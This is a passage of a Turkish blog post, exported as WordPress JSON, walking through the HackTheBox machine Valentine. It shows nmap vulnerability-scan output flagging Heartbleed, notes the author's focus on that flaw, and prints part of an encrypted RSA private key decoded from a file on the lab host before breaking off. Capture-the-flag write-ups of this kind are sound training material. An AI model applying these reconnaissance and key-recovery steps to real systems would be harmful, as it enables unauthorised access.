{"id":1489,"date":"2021-08-12T09:28:18","date_gmt":"2021-08-12T09:28:18","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1489"},"modified":"2021-08-12T20:13:47","modified_gmt":"2021-08-12T20:13:47","slug":"valentine","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/12\/valentine\/","title":{"rendered":"Valentine"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/127\" title=\"Valentine\">Valentine<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/61b3b6a4382f58a804e221062ced0bfb.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPORT    STATE SERVICE  VERSION\n22\/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| vulners: \n|   cpe:\/a:openbsd:openssh:5.9p1: \n|       EDB-ID:21018    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:21018  *EXPLOIT*\n|       CVE-2001-0554   10.0    https:\/\/vulners.com\/cve\/CVE-2001-0554\n|       EDB-ID:40888    7.8 https:\/\/vulners.com\/exploitdb\/EDB-ID:40888  *EXPLOIT*\n|       CVE-2016-6244   7.8 https:\/\/vulners.com\/cve\/CVE-2016-6244\n|       EDB-ID:41173    7.2 https:\/\/vulners.com\/exploitdb\/EDB-ID:41173  *EXPLOIT*\n|       CVE-2016-6241   7.2 https:\/\/vulners.com\/cve\/CVE-2016-6241\n|       CVE-2016-6240   7.2 https:\/\/vulners.com\/cve\/CVE-2016-6240\n|       SSV:60656   5.0 https:\/\/vulners.com\/seebug\/SSV:60656    *EXPLOIT*\n|       CVE-2018-15919  5.0 https:\/\/vulners.com\/cve\/CVE-2018-15919\n|       CVE-2017-15906  5.0 https:\/\/vulners.com\/cve\/CVE-2017-15906\n|       CVE-2010-5107   5.0 https:\/\/vulners.com\/cve\/CVE-2010-5107\n|       CVE-2016-6522   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6522\n|       CVE-2016-6350   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6350\n|       CVE-2016-6247   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6247\n|       CVE-2016-6246   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6246\n|       CVE-2016-6245   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6245\n|       CVE-2016-6243   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6243\n|       CVE-2016-6242   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6242\n|       CVE-2016-6239   4.9 https:\/\/vulners.com\/cve\/CVE-2016-6239\n|       SSV:90447   4.6 https:\/\/vulners.com\/seebug\/SSV:90447    *EXPLOIT*\n|       EDB-ID:45233    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:45233  *EXPLOIT*\n|       EDB-ID:45210    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:45210  *EXPLOIT*\n|       EDB-ID:45001    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:45001  *EXPLOIT*\n|       EDB-ID:45000    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:45000  *EXPLOIT*\n|       EDB-ID:40963    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:40963  *EXPLOIT*\n|       EDB-ID:40962    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:40962  *EXPLOIT*\n|       CVE-2016-0778   4.6 https:\/\/vulners.com\/cve\/CVE-2016-0778\n|       MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2020-14145\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2020-14145\/  *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/F5-BIG-IP-CVE-2020-14145\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/F5-BIG-IP-CVE-2020-14145\/    *EXPLOIT*\n|       CVE-2020-14145  4.3 https:\/\/vulners.com\/cve\/CVE-2020-14145\n|       CVE-2007-2768   4.3 https:\/\/vulners.com\/cve\/CVE-2007-2768\n|       MSF:ILITIES\/UBUNTU-CVE-2016-0777\/   4.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2016-0777\/    *EXPLOIT*\n|       MSF:ILITIES\/IBM-AIX-CVE-2016-0777\/  4.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-AIX-CVE-2016-0777\/   *EXPLOIT*\n|       MSF:ILITIES\/DEBIAN-CVE-2016-0777\/   4.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/DEBIAN-CVE-2016-0777\/    *EXPLOIT*\n|       MSF:ILITIES\/AIX-7.2-OPENSSH_ADVISORY7_CVE-2016-0777\/    4.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AIX-7.2-OPENSSH_ADVISORY7_CVE-2016-0777\/ *EXPLOIT*\n|       MSF:ILITIES\/AIX-7.1-OPENSSH_ADVISORY7_CVE-2016-0777\/    4.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AIX-7.1-OPENSSH_ADVISORY7_CVE-2016-0777\/ *EXPLOIT*\n|       MSF:ILITIES\/AIX-5.3-OPENSSH_ADVISORY7_CVE-2016-0777\/    4.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AIX-5.3-OPENSSH_ADVISORY7_CVE-2016-0777\/ *EXPLOIT*\n|_      CVE-2016-0777   4.0 https:\/\/vulners.com\/cve\/CVE-2016-0777\n80\/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-enum: \n|   \/dev\/: Potentially interesting directory w\/ listing on &#039;apache\/2.2.22 (ubuntu)&#039;\n|_  \/index\/: Potentially interesting folder\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)\n| vulners: \n|   cpe:\/a:apache:http_server:2.2.22: \n|       SSV:60913   7.5 https:\/\/vulners.com\/seebug\/SSV:60913    *EXPLOIT*\n|       CVE-2017-7679   7.5 https:\/\/vulners.com\/cve\/CVE-2017-7679\n|       CVE-2017-7668   7.5 https:\/\/vulners.com\/cve\/CVE-2017-7668\n|       CVE-2017-3169   7.5 https:\/\/vulners.com\/cve\/CVE-2017-3169\n|       CVE-2017-3167   7.5 https:\/\/vulners.com\/cve\/CVE-2017-3167\n|       CVE-2013-2249   7.5 https:\/\/vulners.com\/cve\/CVE-2013-2249\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1012\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1012\/ *EXPLOIT*\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1011\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1011\/ *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2017-17790\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2017-17790\/ *EXPLOIT*\n|       MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/ 6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/  *EXPLOIT*\n|       CVE-2018-1312   6.8 https:\/\/vulners.com\/cve\/CVE-2018-1312\n|       CVE-2017-9788   6.4 https:\/\/vulners.com\/cve\/CVE-2017-9788\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1208\/    5.4 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1208\/ *EXPLOIT*\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1207\/    5.4 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1207\/ *EXPLOIT*\n|       SSV:60788   5.1 https:\/\/vulners.com\/seebug\/SSV:60788    *EXPLOIT*\n|       CVE-2013-1862   5.1 https:\/\/vulners.com\/cve\/CVE-2013-1862\n|       SSV:96537   5.0 https:\/\/vulners.com\/seebug\/SSV:96537    *EXPLOIT*\n|       SSV:62058   5.0 https:\/\/vulners.com\/seebug\/SSV:62058    *EXPLOIT*\n|       SSV:61874   5.0 https:\/\/vulners.com\/seebug\/SSV:61874    *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2014-0231\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2014-0231\/  *EXPLOIT*\n|       MSF:AUXILIARY\/SCANNER\/HTTP\/APACHE_OPTIONSBLEED  5.0 https:\/\/vulners.com\/metasploit\/MSF:AUXILIARY\/SCANNER\/HTTP\/APACHE_OPTIONSBLEED   *EXPLOIT*\n|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    *EXPLOIT*\n|       CVE-2017-9798   5.0 https:\/\/vulners.com\/cve\/CVE-2017-9798\n|       CVE-2014-0231   5.0 https:\/\/vulners.com\/cve\/CVE-2014-0231\n|       CVE-2014-0098   5.0 https:\/\/vulners.com\/cve\/CVE-2014-0098\n|       CVE-2013-6438   5.0 https:\/\/vulners.com\/cve\/CVE-2013-6438\n|       CVE-2013-5704   5.0 https:\/\/vulners.com\/cve\/CVE-2013-5704\n|       1337DAY-ID-28573    5.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-28573    *EXPLOIT*\n|       SSV:60905   4.3 https:\/\/vulners.com\/seebug\/SSV:60905    *EXPLOIT*\n|       SSV:60657   4.3 https:\/\/vulners.com\/seebug\/SSV:60657    *EXPLOIT*\n|       SSV:60653   4.3 https:\/\/vulners.com\/seebug\/SSV:60653    *EXPLOIT*\n|       SSV:60345   4.3 https:\/\/vulners.com\/seebug\/SSV:60345    *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2012-3499\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2012-3499\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2012-4558\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2012-4558\/    *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2012-3499\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2012-3499\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975\/    *EXPLOIT*\n|       MSF:ILITIES\/HPUX-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HPUX-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2012-3499\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2012-3499\/  *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2012-3499\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2012-3499\/  *EXPLOIT*\n|       CVE-2016-4975   4.3 https:\/\/vulners.com\/cve\/CVE-2016-4975\n|       CVE-2013-1896   4.3 https:\/\/vulners.com\/cve\/CVE-2013-1896\n|       CVE-2012-4558   4.3 https:\/\/vulners.com\/cve\/CVE-2012-4558\n|       CVE-2012-3499   4.3 https:\/\/vulners.com\/cve\/CVE-2012-3499\n|       CVE-2012-2687   2.6 https:\/\/vulners.com\/cve\/CVE-2012-2687\n|_      EDB-ID:42745    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:42745  *EXPLOIT*\n443\/tcp open  ssl\/http Apache httpd 2.2.22 ((Ubuntu))\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-enum: \n|   \/dev\/: Potentially interesting directory w\/ listing on &#039;apache\/2.2.22 (ubuntu)&#039;\n|_  \/index\/: Potentially interesting folder\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)\n| ssl-ccs-injection: \n|   VULNERABLE:\n|   SSL\/TLS MITM vulnerability (CCS Injection)\n|     State: VULNERABLE\n|     Risk factor: High\n|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h\n|       does not properly restrict processing of ChangeCipherSpec messages,\n|       which allows man-in-the-middle attackers to trigger use of a zero\n|       length master key in certain OpenSSL-to-OpenSSL communications, and\n|       consequently hijack sessions or obtain sensitive information, via\n|       a crafted TLS handshake, aka the &quot;CCS Injection&quot; vulnerability.\n|           \n|     References:\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-0224\n|       http:\/\/www.openssl.org\/news\/secadv_20140605.txt\n|_      http:\/\/www.cvedetails.com\/cve\/2014-0224\n| ssl-heartbleed: \n|   VULNERABLE:\n|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL\/TLS encryption.\n|     State: VULNERABLE\n|     Risk factor: High\n|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n|           \n|     References:\n|       http:\/\/www.openssl.org\/news\/secadv_20140407.txt \n|       http:\/\/cvedetails.com\/cve\/2014-0160\/\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-0160\n| ssl-poodle: \n|   VULNERABLE:\n|   SSL POODLE information leak\n|     State: VULNERABLE\n|     IDs:  BID:70574  CVE:CVE-2014-3566\n|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n|           products, uses nondeterministic CBC padding, which makes it easier\n|           for man-in-the-middle attackers to obtain cleartext data via a\n|           padding-oracle attack, aka the &quot;POODLE&quot; issue.\n|     Disclosure date: 2014-10-14\n|     Check results:\n|       TLS_RSA_WITH_AES_128_CBC_SHA\n|     References:\n|       https:\/\/www.imperialviolet.org\/2014\/10\/14\/poodle.html\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-3566\n|       https:\/\/www.openssl.org\/~bodo\/ssl-poodle.pdf\n|_      https:\/\/www.securityfocus.com\/bid\/70574\n|_sslv2-drown: \n| vulners: \n|   cpe:\/a:apache:http_server:2.2.22: \n|       SSV:60913   7.5 https:\/\/vulners.com\/seebug\/SSV:60913    *EXPLOIT*\n|       CVE-2017-7679   7.5 https:\/\/vulners.com\/cve\/CVE-2017-7679\n|       CVE-2017-7668   7.5 https:\/\/vulners.com\/cve\/CVE-2017-7668\n|       CVE-2017-3169   7.5 https:\/\/vulners.com\/cve\/CVE-2017-3169\n|       CVE-2017-3167   7.5 https:\/\/vulners.com\/cve\/CVE-2017-3167\n|       CVE-2013-2249   7.5 https:\/\/vulners.com\/cve\/CVE-2013-2249\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1012\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1012\/ *EXPLOIT*\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1011\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1011\/ *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2017-17790\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2017-17790\/ *EXPLOIT*\n|       MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/ 6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/  *EXPLOIT*\n|       CVE-2018-1312   6.8 https:\/\/vulners.com\/cve\/CVE-2018-1312\n|       CVE-2017-9788   6.4 https:\/\/vulners.com\/cve\/CVE-2017-9788\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1208\/    5.4 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1208\/ *EXPLOIT*\n|       MSF:ILITIES\/LINUXRPM-RHSA-2013-1207\/    5.4 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/LINUXRPM-RHSA-2013-1207\/ *EXPLOIT*\n|       SSV:60788   5.1 https:\/\/vulners.com\/seebug\/SSV:60788    *EXPLOIT*\n|       CVE-2013-1862   5.1 https:\/\/vulners.com\/cve\/CVE-2013-1862\n|       SSV:96537   5.0 https:\/\/vulners.com\/seebug\/SSV:96537    *EXPLOIT*\n|       SSV:62058   5.0 https:\/\/vulners.com\/seebug\/SSV:62058    *EXPLOIT*\n|       SSV:61874   5.0 https:\/\/vulners.com\/seebug\/SSV:61874    *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2014-0231\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2014-0231\/  *EXPLOIT*\n|       MSF:AUXILIARY\/SCANNER\/HTTP\/APACHE_OPTIONSBLEED  5.0 https:\/\/vulners.com\/metasploit\/MSF:AUXILIARY\/SCANNER\/HTTP\/APACHE_OPTIONSBLEED   *EXPLOIT*\n|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    *EXPLOIT*\n|       CVE-2017-9798   5.0 https:\/\/vulners.com\/cve\/CVE-2017-9798\n|       CVE-2014-0231   5.0 https:\/\/vulners.com\/cve\/CVE-2014-0231\n|       CVE-2014-0098   5.0 https:\/\/vulners.com\/cve\/CVE-2014-0098\n|       CVE-2013-6438   5.0 https:\/\/vulners.com\/cve\/CVE-2013-6438\n|       CVE-2013-5704   5.0 https:\/\/vulners.com\/cve\/CVE-2013-5704\n|       1337DAY-ID-28573    5.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-28573    *EXPLOIT*\n|       SSV:60905   4.3 https:\/\/vulners.com\/seebug\/SSV:60905    *EXPLOIT*\n|       SSV:60657   4.3 https:\/\/vulners.com\/seebug\/SSV:60657    *EXPLOIT*\n|       SSV:60653   4.3 https:\/\/vulners.com\/seebug\/SSV:60653    *EXPLOIT*\n|       SSV:60345   4.3 https:\/\/vulners.com\/seebug\/SSV:60345    *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2012-3499\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2012-3499\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2012-4558\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2012-4558\/    *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2012-3499\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2012-3499\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975\/    *EXPLOIT*\n|       MSF:ILITIES\/HPUX-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HPUX-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2012-3499\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2012-3499\/  *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2012-4558\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2012-4558\/  *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2012-3499\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2012-3499\/  *EXPLOIT*\n|       CVE-2016-4975   4.3 https:\/\/vulners.com\/cve\/CVE-2016-4975\n|       CVE-2013-1896   4.3 https:\/\/vulners.com\/cve\/CVE-2013-1896\n|       CVE-2012-4558   4.3 https:\/\/vulners.com\/cve\/CVE-2012-4558\n|       CVE-2012-3499   4.3 https:\/\/vulners.com\/cve\/CVE-2012-3499\n|       CVE-2012-2687   2.6 https:\/\/vulners.com\/cve\/CVE-2012-2687\n|_      EDB-ID:42745    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:42745  *EXPLOIT*\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n<p><strong>ssl-heartbleed<\/strong> a\u00e7\u0131k\u00e7as\u0131 bunu en son denedim. Bu zafiyeti bilmeyenler i\u00e7in k\u0131saca a\u00e7\u0131klayayim hedef sunucunun belleinden (san\u0131r\u0131m 64kb'd\u0131) veri okumunza izin sebep oluyor. Bir \u00e7ok \u015fey denedikten sonra bu zafiyete odakland\u0131m.<\/p>\n<p><strong><a href=\"http:\/\/10.10.10.79\/dev\/hype_key\">http:\/\/10.10.10.79\/dev\/hype_key<\/a><\/strong> adresinde hex format\u0131nda bir veri vard\u0131. Bu veriyi bupr decode ile asci format\u0131na d\u00f6n\u00fc\u015ft\u00fcr\u00fcnce bir anahtar elde ettim. <\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Valentine]\n\u2514\u2500# cat key \n- - - - - B E G I N   R S A   P R I V A T E   K E Y - - - - - \n\n P r o c - T y p e :   4 , E N C R Y P T E D \n\n D E K - I n f o :   A E S - 1 2 8 - C B C , A E B 8 8 C 1 4 0 F 6 9 B F 2 0 7 4 7 8 8 D E 2 4 A E 4 8 D 4 6 \n\n D b P r O 7 8 k e g N u k 1 D A q l A N 5 j b j X v 0 P P s o g 3 j d b M F S 8 i E 9 p 3 U O L 0 l F 0 x f 7 P z m r k D a 8 R \n\n 5 y \/ b 4 6 + 9 n E p C M f T P h N u J R c W 2 U 2 g J c O F H + 9 R J D B C 5 U J M U S 1 \/ g j B \/ 7 \/ M y 0 0 M w x + a I 6 \n\n 0 E I 0 S b O Y U A V 1 W 4 E V 7 m 9 6 Q s Z j r w J v n j V a f m 6 V s K a T P B H p u g c A S v M q z 7 6 W 6 a b R Z e X i \n\n E b w 6 6 h j F m A u 4 A z q c M \/ k i g N R F P Y u N i X r X s 1 w \/ d e L C q C J + E a 1 T 8 z l a s 6 f c m h M 8 A + 8 P \n\n O X B K N e 6 l 1 7 h K a T 6 w F n p 5 e X O a U I H v H n v O 6 S c H V W R r Z 7 0 f c p c p i m L 1 w 1 3 T g d d 2 A i G d \n\n p H L J p Y U I I 5 P u O 6 x + L S 8 n 1 r \/ G W M q S O E i m N R D 1 j \/ 5 9 \/ 4 u 3 R O r T C K e o 9 D s T R q s 2 k 1 S H \n\n Q d W w F w a X b Y y T 1 u x A M S l 5 H q 9 O D 5 H J 8 G 0 R 6 J I 5 R v C N U Q j w x 0 F I T j j M j n L I p x j v f q + E \n\n p 0 g D 0 U c y l K m 6 r C Z q a c w n S d d H W 8 W 3 L x J m C x d x W 5 l t 5 d P j A k B Y R U n l 9 1 E S C i D 4 Z + u C \n\n O l 6 j L F D 2 k a O L f u y e e 0 f Y C b 7 G T q O e 7 E m M B 3 f G I w S d W 8 O C 8 N W T k w p j c 0 E L b l U a 6 u l O \n\n t 9 g r S o s R T C s Z d 1 4 O P t s 4 b L s p K x M M O s g n K l o X v n l P O S w S p W y 9 W p 6 y 8 X X 8 + F 4 0 r x l 5 \n\n X q h D U B h y k 1 C 3 Y P O i D u P O n M X a I p e 1 d g b 0 N d D 1 M 9 Z Q S N U L w 1 D H C G P P 4 J S S x X 7 B W d D K \n\n a A n W J v F g l A 4 o F B B V A 8 u A P M f V 2 X F Q n j w U T 5 b P L C 6 5 t F s t o R t T Z 1 u S r u a i 2 7 k x T n L Q \n\n + w Q 8 7 l M a d d s 1 G Q N e G s K S f 8 R \/ r s R K e e K c i l D e P C j e a L q t q x n h N o F t g 0 M x t 6 r 2 g b 1 E \n\n A l o Q 6 j g 5 T b j 5 J 7 q u Y X Z P y l B l j N p 9 G V p i n P c 3 K p H t t v g b p t f i W E E s Z Y n 5 y Z P h U r 9 Q \n\n r 0 8 p k O x A r X E 2 d j 7 e X + b q 6 5 6 3 5 O J 6 T q H b A l T Q 1 R s 9 P u l r S 7 K 4 S L X 7 n Y 8 9 \/ R Z 5 o S Q e \n\n 2 V W R y T Z 1 F f n g J S s v 9 + M f v z 3 4 1 l b z O I W m k 7 W f E c W c H c 1 6 n 9 V 0 I b S N A L n j T h v E c P k y \n\n e 1 B s f S b s f 9 F g u U Z k g H A n n f R K k G V G 1 O V y u w c \/ L V j m b h Z z K w L h a Z R N d 8 H E M 8 6 f N o j P \n\n 0 9 n V j T a Y t W U X k 0 S i 1 W 0 2 w b u 1 N z L + 